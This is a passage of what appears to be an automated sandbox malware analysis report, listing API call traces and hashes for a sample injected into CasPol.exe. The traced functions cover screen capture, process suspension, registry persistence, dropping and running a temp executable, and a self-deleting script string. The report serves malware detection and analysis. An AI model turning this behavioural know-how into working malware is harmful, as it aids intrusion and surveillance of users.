                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                    • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                    • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                    • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACDC
                                                                                                                    • NtSuspendProcess.NTDLL(00000000), ref: 0041ACE9
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACF2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseHandleOpenSuspend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1999457699-0
                                                                                                                    • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                    • Instruction ID: 2f9544719979d624048292b5ab27ab43be47c8216fe5e38c5e6db7c07fdef43b
                                                                                                                    • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                    • Instruction Fuzzy Hash: 36D0A733505132638221176A7C0CC87EE6CDFC1EB37024136F805C3220DE30C88186F4
                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041AD08
                                                                                                                    • NtResumeProcess.NTDLL(00000000), ref: 0041AD15
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseHandleOpenResume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3614150671-0
                                                                                                                    • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                    • Instruction ID: 37c2ac379339410306f7c92c5038f8fbeac8a1766455cc2515cdfea107740f35
                                                                                                                    • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                    • Instruction Fuzzy Hash: 3AD05E32504121638220176A7C0C887EEA9DBC5AB37024236F804C26219A24C841C6A4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 0-248832578
                                                                                                                    • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                    • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                                                                                                                    • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                    • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 0-248832578
                                                                                                                    • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                    • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                    • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                    • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                                    • API String ID: 2299586839-2904428671
                                                                                                                    • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                    • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                                    • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                    • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1663032902-0
                                                                                                                    • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                    • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                                                                                    • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                    • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1084509184-0
                                                                                                                    • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                                                                                    • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                                                                                    • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                                                                                    • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2692324296-0
                                                                                                                    • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                    • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                                                                                    • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                    • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1084509184-0
                                                                                                                    • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                                                                                    • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                                                                                    • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                                                                                    • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                                    • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1272433827-0
                                                                                                                    • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                    • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                                                                                    • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                    • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1084509184-0
                                                                                                                    • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                    • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                                                                                    • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                    • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                    • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                                                                                                    • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    APIs
                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                                                                                      • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                                                                                    • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                                                                                    • DeleteDC.GDI32(?), ref: 0041806D
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418070
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                                                                                    • GetCursorInfo.USER32(?), ref: 004180C5
                                                                                                                    • GetIconInfo.USER32(?,?), ref: 004180DB
                                                                                                                    • DeleteObject.GDI32(?), ref: 0041810A
                                                                                                                    • DeleteObject.GDI32(?), ref: 00418117
                                                                                                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                                                                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                                                                                    • DeleteDC.GDI32(?), ref: 0041828F
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418292
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00418295
                                                                                                                    • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00418354
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0041835B
                                                                                                                    • DeleteDC.GDI32(?), ref: 0041836B
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418376
                                                                                                                    • DeleteDC.GDI32(?), ref: 004183A8
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                                    • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                    • String ID: DISPLAY
                                                                                                                    • API String ID: 1352755160-865373369
                                                                                                                    • Opcode ID: 545df083f5f8f775bec5cd45ee69504d007fb648be419a0b1d313c64b3242661
                                                                                                                    • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                                                                                    • Opcode Fuzzy Hash: 545df083f5f8f775bec5cd45ee69504d007fb648be419a0b1d313c64b3242661
                                                                                                                    • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                                                                                    APIs
                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                    • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                      • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                      • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                      • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                      • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                    • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                      • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                      • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                      • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                      • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                    • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                    • API String ID: 4250697656-2665858469
                                                                                                                    • Opcode ID: 0f3d8273c2450781682a40f4251623d23898c6c12ff08a1a6ea7cde3ae6d6a1f
                                                                                                                    • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                                                                                    • Opcode Fuzzy Hash: 0f3d8273c2450781682a40f4251623d23898c6c12ff08a1a6ea7cde3ae6d6a1f
                                                                                                                    • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
